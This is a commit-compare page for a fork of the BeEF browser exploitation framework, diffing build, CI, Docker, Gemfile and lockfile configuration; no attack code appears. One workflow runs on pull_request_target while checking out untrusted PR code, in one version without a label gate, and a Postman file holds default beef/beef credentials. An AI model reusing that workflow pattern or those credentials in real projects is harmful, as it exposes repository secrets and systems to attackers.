Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:red/workflow-security-improvements
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:revert-2594-revert-2590-master
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

1 Commits
red/workfl ... revert-259

Author SHA1 Message Date
jcrew99
15b6bf25a8 Revert "Revert "Add support for the SuSE family in the installer (#2590)" (#2594)" 
This reverts commit dc9e41c55a.
 2022-10-13 13:31:38 +10:00
1482 changed files with 52411 additions and 30060 deletions
Expand all files Collapse all files

1
.bundle/config
View File

@@ -1,3 +1,2 @@
---
BUNDLE_WITHOUT: "development:test"
BUNDLE_WITH: "geoip:ext_msf:ext_notifications:ext_dns:ext_qrcode"

3
.dockerignore
View File

@@ -4,5 +4,6 @@
.gitignore
doc
docs
scripts
test
update-beef
update-beef

8
.github/ISSUE_TEMPLATE/bug_report.md → .github/ISSUE_TEMPLATE.md vendored
View File

@@ -1,8 +1,3 @@
---
name: Bug report
about: Report a bug to help us improve BeEF
---
## First Steps
1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
@@ -31,7 +26,6 @@ about: Report a bug to help us improve BeEF
2. Update `client_debug` to `true`
3. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
4. Retrieve your server-side logs from `~/.beef/beef.log`
* If you have a kali (beef-xss) problem, you can submit a bug here:
https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/
* If using **beef-xss** logs found with `journalctl -u beef-xss`
**If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**

5
.github/ISSUE_TEMPLATE/config.yml vendored
View File

@@ -1,5 +0,0 @@
blank_issues_enabled: false
contact_links:
- name: Questions / Support
url: https://github.com/beefproject/beef/wiki
about: Please check the wiki before opening an issue.

26
.github/workflows/dependabot-auto-merge.yml vendored
View File

@@ -1,26 +0,0 @@
name: Dependabot auto-merge
on:
pull_request:
branches:
- master
permissions:
contents: write
pull-requests: write
jobs:
dependabot:
runs-on: ubuntu-latest
if: github.event.pull_request.user.login == 'dependabot[bot]' && github.repository == 'beefproject/beef'
steps:
- name: Dependabot metadata
id: metadata
uses: dependabot/fetch-metadata@v2
with:
github-token: "${{ secrets.GITHUB_TOKEN }}"
- name: Enable auto-merge for Dependabot PRs
if: success() && (steps.metadata.outputs.update-type == 'version-update:semver-minor' || steps.metadata.outputs.update-type == 'version-update:semver-patch')
run: gh pr merge --auto --merge "$PR_URL"
env:
PR_URL: ${{ github.event.pull_request.html_url }}
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

38
.github/workflows/github_actions.yml vendored
View File

@@ -2,34 +2,25 @@ name: 'BrowserStack Test'
on:
pull_request_target:
types: [opened, synchronize, reopened, labeled]
branches: [ master ]
jobs:
approve:
runs-on: ubuntu-latest
jobs:
steps:
- name: Approve
run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
ubuntu-job:
name: 'BrowserStack Test on Ubuntu'
if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
runs-on: ubuntu-latest # Can be self-hosted runner also
permissions:
contents: read
pull-requests: write
environment:
name: Integrate Pull Request
env:
GITACTIONS: true
steps:
- name: 'Remove safe-to-test label'
uses: actions/github-script@v6
with:
script: |
github.rest.issues.removeLabel({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: context.issue.number,
name: 'safe-to-test'
})
- name: 'BrowserStack Env Setup' # Invokes the setup-env action
uses: browserstack/github-actions/setup-env@master
with:
@@ -43,29 +34,26 @@ jobs:
local-identifier: random
- name: 'Checkout the repository'
uses: actions/checkout@v4
uses: actions/checkout@v2
with:
ref: ${{ github.event.pull_request.head.sha }}
fetch-depth: 2
- name: 'Setting up Ruby'
uses: ruby/setup-ruby@v1
# Ruby version is defined in .ruby-version file
with:
ruby-version: 3.0.3 # Not needed with a .ruby-version file
- name: 'Update and Install Dependencies'
- name: 'Build and run tests'
run: |
sudo apt update
sudo apt install libcurl4 libcurl4-openssl-dev
- name: 'Configure Bundle testing and install gems'
run: |
bundle config unset --local without
bundle config set --local with 'test' 'development'
bundle install
- name: 'Run BrowserStack simple verification'
run: |
bundle exec rake browserstack --trace
- name: 'BrowserStackLocal Stop' # Terminating the BrowserStackLocal tunnel connection
uses: browserstack/github-actions/setup-local@master
with:
local-testing: stop
local-testing: stop

8
.github/workflows/stale.yml vendored
View File

@@ -21,10 +21,10 @@ jobs:
- uses: actions/stale@v5
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}
days-before-stale: 14
days-before-pr-stale: 29
days-before-close: 11
days-before-pr-close: 31
days-before-stale: 7
days-before-pr-stale: 14
days-before-close: 7
days-before-pr-close: 14
stale-issue-message: 'This issue as been marked as stale due to inactivity and will be closed in 7 days'
stale-pr-message: 'Stale pull request message'
stale-issue-label: 'Stale'

8
.gitignore vendored
View File

@@ -1,7 +1,5 @@
### BeEF ###
beef.db
beef.db-shm
beef.db-wal
beef.log
test/msf-test
extensions/admin_ui/media/javascript-min/
@@ -27,9 +25,6 @@ coverage/
# BrowserStack
local.log
# Visual Studio Code
.vscode/
# The following lines were created by https://www.gitignore.io
### Linux ###
@@ -131,6 +126,3 @@ node_modules/
# Generated files
out/
doc/rdoc/
# Secrets for testing github actions locally
.secrets

2
.rubocop.yml
View File

@@ -4,7 +4,7 @@ AllCops:
- 'tmp/**/*'
- 'tools/**/*'
- 'doc/**/*'
TargetRubyVersion: <%= File.read(".ruby-version").strip[/^(\d+\.\d+)/, 1] || raise("Ruby version not found") %>
TargetRubyVersion: 3.0
NewCops: enable
Layout/LineLength:

2
.ruby-version
View File

@@ -1 +1 @@
3.4.7
3.0.3

49
BeEF.postman_environment.json Normal file
View File

@@ -0,0 +1,49 @@
{
"id": "3b5f29e6-c8eb-4d23-bf52-c01255f22f08",
"name": "BeEF",
"values": [
{
"key": "hostname",
"value": "127.0.0.1",
"enabled": true
},
{
"key": "username",
"value": "beef",
"enabled": true
},
{
"key": "password",
"value": "beef",
"enabled": true
},
{
"key": "token",
"value": "",
"enabled": true
},
{
"key": "session",
"value": "",
"enabled": true
},
{
"key": "module_id",
"value": "",
"enabled": true
},
{
"key": "cmd_id",
"value": "",
"enabled": true
},
{
"key": "dnsrule_id",
"value": "",
"enabled": true
}
],
"_postman_variable_scope": "environment",
"_postman_exported_at": "2020-01-03T06:00:29.827Z",
"_postman_exported_using": "Postman/7.14.0"
}

110
Dockerfile
View File

@@ -1,109 +1,63 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###########################################################################################################
###########################################################################################################
## ##
## Please read the Wiki Installation section on set-up using Docker prior to building this container. ##
## BeEF does NOT allow authentication with default credentials. So please, at the very least ##
## change the username:password in the config.yaml file to something secure that is not beef:beef ##
## before building or you will be denied access and have to rebuild anyway. ##
## before building or you will to denied access and have to rebuild anyway. ##
## ##
###########################################################################################################
###########################################################################################################
# ---------------------------- Start of Builder 0 - Gemset Build ------------------------------------------
FROM ruby:3.4.7-slim-bookworm AS builder
FROM ruby:2.7.5-alpine AS builder
LABEL maintainer="Beef Project: github.com/beefproject/beef"
# Install gems in parallel with 4 workers to expedite build process.=
ARG BUNDLER_ARGS="--jobs=4"
# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files
RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc
COPY . /beef
# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files.
# Then add bundler/gem dependencies and install.
# Finally change permissions of bundle installs so we don't need to run as root.
RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
git \
curl \
libssl-dev \
xz-utils \
pkg-config \
make \
g++ \
libcurl4-openssl-dev \
ruby-dev \
libyaml-dev \
libffi-dev \
zlib1g-dev \
libsqlite3-dev \
sqlite3 \
&& bundle install --gemfile=/beef/Gemfile --jobs=`nproc` \
&& rm -rf /usr/local/bundle/cache \
&& chmod -R a+r /usr/local/bundle \
&& rm -rf /var/lib/apt/lists/*
# Add bundler/gem dependencies and then install
RUN apk add --no-cache git curl libcurl curl-dev ruby-dev libffi-dev make g++ gcc musl-dev zlib-dev sqlite-dev && \
bundle install --gemfile=/beef/Gemfile $BUNDLER_ARGS && \
# Temp fix for https://github.com/bundler/bundler/issues/6680
rm -rf /usr/local/bundle/cache
WORKDIR /beef
# So we don't need to run as root
RUN chmod -R a+r /usr/local/bundle
# ------------------------------------- End of Builder 0 -------------------------------------------------
# ---------------------------- Start of Builder 1 - Final Build ------------------------------------------
FROM ruby:3.4.7-slim-bookworm
LABEL maintainer="Beef Project" \
source_url="github.com/beefproject/beef" \
homepage="https://beefproject.com/"
FROM ruby:2.7.5-alpine
LABEL maintainer="Beef Project: github.com/beefproject/beef"
# BeEF UI/Hook port
ARG UI_PORT=3000
ARG PROXY_PORT=6789
ARG WEBSOCKET_PORT=61985
ARG WEBSOCKET_SECURE_PORT=61986
# Create service account to run BeEF
RUN adduser -h /beef -g beef -D beef
# Create service account to run BeEF and install BeEF's runtime dependencies
RUN adduser --home /beef --gecos beef --disabled-password beef \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
curl \
wget \
espeak \
lame \
openssl \
libreadline-dev \
libyaml-dev \
libxml2-dev \
libxslt-dev \
libncurses5-dev \
libsqlite3-dev \
sqlite3 \
zlib1g \
bison \
nodejs \
firefox-esr \
&& apt-get -y clean \
&& rm -rf /var/lib/apt/lists/*
# Install geckodriver for Selenium tests
# Pin version and verify checksum to mitigate supply chain attacks
ENV GECKODRIVER_VERSION=v0.36.0
ENV GECKODRIVER_SHA256=0bde38707eb0a686a20c6bd50f4adcc7d60d4f73c60eb83ee9e0db8f65823e04
RUN wget -q "https://github.com/mozilla/geckodriver/releases/download/${GECKODRIVER_VERSION}/geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" \
&& echo "${GECKODRIVER_SHA256} geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" | sha256sum -c - \
&& tar -xzf "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" -C /usr/local/bin \
&& chmod +x /usr/local/bin/geckodriver \
&& rm "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz"
COPY --chown=1000:1000 . /beef
# Use gemset created by the builder above
COPY --chown=beef:beef . /beef
COPY --from=builder /usr/local/bundle /usr/local/bundle
# Install BeEF's runtime dependencies
RUN apk add --no-cache curl git build-base openssl readline-dev zlib zlib-dev libressl-dev yaml-dev sqlite-dev sqlite libxml2-dev libxslt-dev autoconf libc6-compat ncurses automake libtool bison nodejs
WORKDIR /beef
# Ensure we are using our service account by default
USER beef
# Expose UI, Proxy, WebSocket server, and WebSocketSecure server ports
EXPOSE $UI_PORT $PROXY_PORT $WEBSOCKET_PORT $WEBSOCKET_SECURE_PORT
# Expose UI, Proxy, WebSocket server, and WebSocketSecure server
EXPOSE 3000 6789 61985 61986
HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:$UI_PORT" ]
HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:3000" ]
WORKDIR /beef
ENTRYPOINT ["/beef/beef"]
# ------------------------------------- End of Builder 1 -------------------------------------------------

108
Gemfile
View File

@@ -1,90 +1,90 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
#gem 'simplecov', require: false, group: :test
gem 'net-smtp', require: false
gem 'json'
gem 'eventmachine', '~> 1.2', '>= 1.2.7'
gem 'thin', '~> 2.0'
gem 'sinatra', '~> 4.1'
gem 'rack', '~> 3.2'
gem 'rack-protection', '~> 4.2.1'
gem 'em-websocket', '~> 0.5.3' # WebSocket support
gem 'uglifier', '~> 4.2'
gem 'mime-types', '~> 3.7'
gem 'execjs', '~> 2.10'
gem 'ansi', '~> 1.5'
gem 'eventmachine'
gem 'thin'
gem 'sinatra', '>= 2.2.0'
gem 'rack', '>= 2.2.4'
gem 'rack-protection', '>= 2.2.0'
gem 'em-websocket' # WebSocket support
gem 'uglifier', '>= 4.2.0'
gem 'mime-types'
gem 'execjs'
gem 'ansi'
gem 'term-ansicolor', :require => 'term/ansicolor'
gem 'rubyzip', '~> 3.2'
gem 'espeak-ruby', '~> 1.1.0' # Text-to-Voice
gem 'rake', '~> 13.3'
gem 'activerecord', '~> 8.1'
gem 'otr-activerecord', '~> 2.6.0'
gem 'sqlite3', '~> 2.9'
gem 'rubocop', '~> 1.82.1', require: false
gem 'json'
gem 'rubyzip', '>= 1.2.2'
gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
gem 'rake', '>= 13.0'
gem 'otr-activerecord', '>= 1.4.2'
gem 'sqlite3'
gem 'rubocop', '~> 1.36.0', require: false
# Geolocation support
group :geoip do
gem 'maxmind-db', '~> 1.4'
gem 'maxmind-db'
end
gem 'parseconfig', '~> 1.1', '>= 1.1.2'
gem 'erubis', '~> 2.7'
gem 'parseconfig'
gem 'erubis'
# Metasploit Integration extension
group :ext_msf do
gem 'msfrpc-client', '~> 1.1', '>= 1.1.2'
gem 'xmlrpc', '~> 0.3.3'
gem 'msfrpc-client'
gem 'xmlrpc'
end
# Notifications extension
group :ext_notifications do
gem 'unf'
gem 'domain_name', '>= 0.5.20190701'
# Pushover
gem 'rushover', '~> 0.3.0'
gem 'rushover'
# Slack
gem 'slack-notifier', '~> 2.4'
gem 'slack-notifier'
# Twitter
gem 'twitter', '>= 7.0.0'
end
# DNS extension
group :ext_dns do
gem 'async-dns', '~> 1.4'
gem 'async', '~> 1.32'
gem 'async-dns'
end
# QRcode extension
group :ext_qrcode do
gem 'qr4r', '~> 0.6.1'
gem 'qr4r'
end
# For running unit tests
group :test do
gem 'test-unit-full', '~> 0.0.5'
gem 'rspec', '~> 3.13'
gem 'rdoc', '~> 7.1'
gem 'browserstack-local', '~> 1.4'
gem 'irb', '~> 1.16'
gem 'pry-byebug', '~> 3.12'
gem 'rest-client', '~> 2.1.0'
gem 'websocket-client-simple', '~> 0.6.1'
# Note: curb gem requires curl libraries
# sudo apt-get install libcurl4-openssl-dev
gem 'curb', '~> 1.2'
# Note: selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
# gem 'selenium' # Requires old version of selenium which is no longer available
gem 'geckodriver-helper', '~> 0.24.0'
gem 'selenium-webdriver', '~> 4.40'
# Note: nokogiri is needed by capybara which may require one of the below commands
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem 'capybara', '~> 3.40'
gem 'test-unit'
gem 'test-unit-full'
gem 'rspec'
gem 'rdoc'
# curb gem requires curl libraries
# sudo apt-get install libcurl4-openssl-dev
gem 'curb'
# selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
# gem 'selenium' # Requires old version of selenium which is no longer available
gem 'geckodriver-helper'
gem 'selenium-webdriver'
# nokogirl is needed by capybara which may require one of the below commands
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem 'capybara'
# RESTful API tests/generic command module tests
gem 'rest-client', '>= 2.1.0'
gem 'irb'
gem 'pry-byebug'
gem "websocket-client-simple", "~> 0.6.0"
gem "browserstack-local", "~> 1.4"
end
source 'https://rubygems.org'

448
Gemfile.lock
View File

@@ -1,250 +1,206 @@
GEM
remote: https://rubygems.org/
specs:
activemodel (8.1.2)
activesupport (= 8.1.2)
activerecord (8.1.2)
activemodel (= 8.1.2)
activesupport (= 8.1.2)
timeout (>= 0.4.0)
activesupport (8.1.2)
base64
bigdecimal
concurrent-ruby (~> 1.0, >= 1.3.1)
connection_pool (>= 2.2.5)
drb
activemodel (7.0.3.1)
activesupport (= 7.0.3.1)
activerecord (7.0.3.1)
activemodel (= 7.0.3.1)
activesupport (= 7.0.3.1)
activesupport (7.0.3.1)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 1.6, < 2)
json
logger (>= 1.4.2)
minitest (>= 5.1)
securerandom (>= 0.3)
tzinfo (~> 2.0, >= 2.0.5)
uri (>= 0.13.1)
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
tzinfo (~> 2.0)
addressable (2.8.0)
public_suffix (>= 2.0.2, < 5.0)
ansi (1.5.0)
archive-zip (0.13.1)
io-like (~> 0.4.0)
ast (2.4.3)
async (1.32.1)
archive-zip (0.12.0)
io-like (~> 0.3.0)
ast (2.4.2)
async (1.30.3)
console (~> 1.10)
nio4r (~> 2.3)
timers (~> 4.1)
async-dns (1.4.1)
async-dns (1.3.0)
async-io (~> 1.15)
async-io (1.33.0)
async
io-endpoint
base64 (0.3.0)
bigdecimal (4.0.1)
browserstack-local (1.4.3)
byebug (13.0.0)
reline (>= 0.6.0)
capybara (3.40.0)
browserstack-local (1.4.0)
buftok (0.2.0)
byebug (11.1.3)
capybara (3.37.1)
addressable
matrix
mini_mime (>= 0.1.3)
nokogiri (~> 1.11)
nokogiri (~> 1.8)
rack (>= 1.6.0)
rack-test (>= 0.6.3)
regexp_parser (>= 1.5, < 3.0)
xpath (~> 3.2)
childprocess (4.1.0)
coderay (1.1.3)
concurrent-ruby (1.3.6)
connection_pool (3.0.2)
console (1.34.0)
fiber-annotation
fiber-local (~> 1.1)
json
curb (1.2.2)
concurrent-ruby (1.1.10)
console (1.15.3)
fiber-local
curb (1.0.1)
daemons (1.4.1)
date (3.5.1)
diff-lcs (1.6.2)
domain_name (0.6.20240107)
drb (2.2.3)
diff-lcs (1.5.0)
domain_name (0.5.20190701)
unf (>= 0.0.5, < 1.0.0)
em-websocket (0.5.3)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0)
erb (6.0.1)
equalizer (0.0.11)
erubis (2.7.0)
espeak-ruby (1.1.0)
event_emitter (0.2.6)
eventmachine (1.2.7)
execjs (2.10.0)
fiber-annotation (0.2.0)
fiber-local (1.1.0)
fiber-storage
fiber-storage (1.0.1)
execjs (2.8.1)
ffi (1.15.5)
ffi-compiler (1.0.1)
ffi (>= 1.0.0)
rake
fiber-local (1.0.0)
geckodriver-helper (0.24.0)
archive-zip (~> 0.7)
hashie (5.0.0)
hashie-forbidden_attributes (0.1.1)
hashie (>= 3.0)
http (4.4.1)
addressable (~> 2.3)
http-cookie (~> 1.0)
http-form_data (~> 2.2)
http-parser (~> 1.2.0)
http-accept (1.7.0)
http-cookie (1.0.8)
http-cookie (1.0.5)
domain_name (~> 0.5)
http_parser.rb (0.8.0)
i18n (1.14.8)
http-form_data (2.3.0)
http-parser (1.2.3)
ffi-compiler (>= 1.0, < 2.0)
http_parser.rb (0.6.0)
i18n (1.12.0)
concurrent-ruby (~> 1.0)
io-console (0.8.2)
io-endpoint (0.15.2)
io-like (0.4.0)
irb (1.16.0)
pp (>= 0.6.0)
rdoc (>= 4.0.0)
reline (>= 0.4.2)
json (2.18.0)
language_server-protocol (3.17.0.5)
lint_roller (1.1.0)
logger (1.7.0)
matrix (0.4.3)
maxmind-db (1.4.0)
method_source (1.1.0)
mime-types (3.7.0)
logger
mime-types-data (~> 3.2025, >= 3.2025.0507)
mime-types-data (3.2025.0902)
mini_mime (1.1.5)
minitest (6.0.1)
prism (~> 1.5)
mojo_magick (0.6.8)
io-console (0.5.11)
io-like (0.3.1)
irb (1.4.2)
reline (>= 0.3.0)
json (2.6.2)
matrix (0.4.2)
maxmind-db (1.1.1)
memoizable (0.4.2)
thread_safe (~> 0.3, >= 0.3.1)
method_source (1.0.0)
mime-types (3.4.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2022.0105)
mini_mime (1.1.2)
minitest (5.16.2)
mojo_magick (0.6.7)
msfrpc-client (1.1.2)
msgpack (~> 1)
msgpack (1.8.0)
mustermann (3.0.4)
msgpack (1.5.4)
multipart-post (2.2.3)
mustermann (3.0.0)
ruby2_keywords (~> 0.0.1)
net-protocol (0.2.2)
naught (1.1.0)
net-protocol (0.1.3)
timeout
net-smtp (0.5.1)
net-smtp (0.3.2)
net-protocol
netrc (0.11.0)
nio4r (2.7.4)
nokogiri (1.18.9-aarch64-linux-gnu)
nio4r (2.5.8)
nokogiri (1.13.8-x86_64-linux)
racc (~> 1.4)
nokogiri (1.18.9-aarch64-linux-musl)
racc (~> 1.4)
nokogiri (1.18.9-arm-linux-gnu)
racc (~> 1.4)
nokogiri (1.18.9-arm-linux-musl)
racc (~> 1.4)
nokogiri (1.18.9-arm64-darwin)
racc (~> 1.4)
nokogiri (1.18.9-x86_64-darwin)
racc (~> 1.4)
nokogiri (1.18.9-x86_64-linux-gnu)
racc (~> 1.4)
nokogiri (1.18.9-x86_64-linux-musl)
racc (~> 1.4)
otr-activerecord (2.6.0)
activerecord (>= 6.0, < 9.0)
parallel (1.27.0)
otr-activerecord (2.1.1)
activerecord (>= 4.0, < 7.1)
hashie-forbidden_attributes (~> 0.1)
parallel (1.22.1)
parseconfig (1.1.2)
parser (3.3.10.0)
parser (3.1.2.1)
ast (~> 2.4.1)
racc
power_assert (2.0.5)
pp (0.6.3)
prettyprint
prettyprint (0.2.0)
prism (1.7.0)
pry (0.16.0)
power_assert (2.0.1)
pry (0.14.1)
coderay (~> 1.1)
method_source (~> 1.0)
reline (>= 0.6.0)
pry-byebug (3.12.0)
byebug (~> 13.0)
pry (>= 0.13, < 0.17)
psych (5.3.1)
date
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
psych (4.0.4)
stringio
public_suffix (6.0.2)
qr4r (0.6.2)
public_suffix (4.0.7)
qr4r (0.6.1)
mojo_magick (~> 0.6.5)
rqrcode_core (~> 1.0)
racc (1.8.1)
rack (3.2.4)
rack-protection (4.2.1)
base64 (>= 0.1.0)
logger (>= 1.6.0)
rack (>= 3.0.0, < 4)
rack-session (2.1.1)
base64 (>= 0.1.0)
rack (>= 3.0.0)
rack-test (2.2.0)
rqrcode_core (~> 0.1)
racc (1.6.0)
rack (2.2.4)
rack-protection (3.0.2)
rack
rack-test (2.0.2)
rack (>= 1.3)
rainbow (3.1.1)
rake (13.3.1)
rdoc (7.1.0)
erb
rake (13.0.6)
rdoc (6.4.0)
psych (>= 4.0.0)
tsort
regexp_parser (2.11.3)
reline (0.6.3)
regexp_parser (2.5.0)
reline (0.3.1)
io-console (~> 0.5)
rest-client (2.1.0)
http-accept (>= 1.7.0, < 2.0)
http-cookie (>= 1.0.2, < 2.0)
mime-types (>= 1.16, < 4.0)
netrc (~> 0.8)
rexml (3.4.4)
rqrcode_core (1.2.0)
rr (3.1.2)
rspec (3.13.2)
rspec-core (~> 3.13.0)
rspec-expectations (~> 3.13.0)
rspec-mocks (~> 3.13.0)
rspec-core (3.13.6)
rspec-support (~> 3.13.0)
rspec-expectations (3.13.5)
rexml (3.2.5)
rqrcode_core (0.2.0)
rr (3.1.0)
rspec (3.11.0)
rspec-core (~> 3.11.0)
rspec-expectations (~> 3.11.0)
rspec-mocks (~> 3.11.0)
rspec-core (3.11.0)
rspec-support (~> 3.11.0)
rspec-expectations (3.11.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
rspec-mocks (3.13.6)
rspec-support (~> 3.11.0)
rspec-mocks (3.11.1)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
rspec-support (3.13.6)
rubocop (1.82.1)
rspec-support (~> 3.11.0)
rspec-support (3.11.0)
rubocop (1.36.0)
json (~> 2.3)
language_server-protocol (~> 3.17.0.2)
lint_roller (~> 1.1.0)
parallel (~> 1.10)
parser (>= 3.3.0.2)
parser (>= 3.1.2.1)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 2.9.3, < 3.0)
rubocop-ast (>= 1.48.0, < 2.0)
regexp_parser (>= 1.8, < 3.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.20.1, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 2.4.0, < 4.0)
rubocop-ast (1.48.0)
parser (>= 3.3.7.2)
prism (~> 1.4)
ruby-progressbar (1.13.0)
unicode-display_width (>= 1.4.0, < 3.0)
rubocop-ast (1.21.0)
parser (>= 3.1.1.0)
ruby-progressbar (1.11.0)
ruby2_keywords (0.0.5)
rubyzip (3.2.2)
rubyzip (2.3.2)
rushover (0.3.0)
json
rest-client
securerandom (0.4.1)
selenium-webdriver (4.40.0)
base64 (~> 0.2)
logger (~> 1.4)
selenium-webdriver (4.5.0)
childprocess (>= 0.5, < 5.0)
rexml (~> 3.2, >= 3.2.5)
rubyzip (>= 1.2.2, < 4.0)
rubyzip (>= 1.2.2, < 3.0)
websocket (~> 1.0)
sinatra (4.2.1)
logger (>= 1.6.0)
simple_oauth (0.3.1)
sinatra (3.0.2)
mustermann (~> 3.0)
rack (>= 3.0.0, < 4)
rack-protection (= 4.2.1)
rack-session (>= 2.0.0, < 3)
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.0.2)
tilt (~> 2.0)
slack-notifier (2.4.0)
sqlite3 (2.9.0-aarch64-linux-gnu)
sqlite3 (2.9.0-aarch64-linux-musl)
sqlite3 (2.9.0-arm-linux-gnu)
sqlite3 (2.9.0-arm-linux-musl)
sqlite3 (2.9.0-arm64-darwin)
sqlite3 (2.9.0-x86_64-darwin)
sqlite3 (2.9.0-x86_64-linux-gnu)
sqlite3 (2.9.0-x86_64-linux-musl)
stringio (3.2.0)
sqlite3 (1.5.3-x86_64-linux)
stringio (3.0.2)
sync (0.5.0)
term-ansicolor (1.11.3)
tins (~> 1)
test-unit (3.7.0)
term-ansicolor (1.7.1)
tins (~> 1.0)
test-unit (3.5.5)
power_assert
test-unit-context (0.5.1)
test-unit (>= 2.4.0)
@@ -261,89 +217,93 @@ GEM
test-unit (>= 2.5.2)
test-unit-runner-tap (1.1.2)
test-unit
thin (2.0.1)
thin (1.8.1)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
logger
rack (>= 1, < 4)
tilt (2.6.1)
timeout (0.6.0)
timers (4.4.0)
tins (1.43.0)
bigdecimal
rack (>= 1, < 3)
thread_safe (0.3.6)
